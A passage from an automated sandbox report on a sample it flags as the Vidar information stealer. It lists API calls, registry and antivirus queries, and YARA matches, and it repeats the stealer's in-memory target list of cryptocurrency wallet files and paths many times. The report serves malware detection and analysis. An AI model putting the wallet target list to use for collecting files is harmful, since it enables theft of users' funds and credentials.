etlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,3_2_02A28DC4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_02A29D6E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,3_2_02A2E56F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_02A27576
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: EnumSystemLocalesA,3_2_02A2B556
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5CD64B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6D5CD64B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A10C53 GetProcessHeap,RtlAllocateHeap,GetUserNameA,3_2_02A10C53
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A10D2E GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,3_2_02A10D2E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: MsMpEng.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Vidar
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Yara detected Vidar stealer
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.file.exe.6d5e2000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.6d5e2000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.aspnet_regiis.exe.2a00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.6d5b0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 1420, type: MEMORYSTR
                      Found many strings related to Crypto-Wallets (likely being stolen)
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local 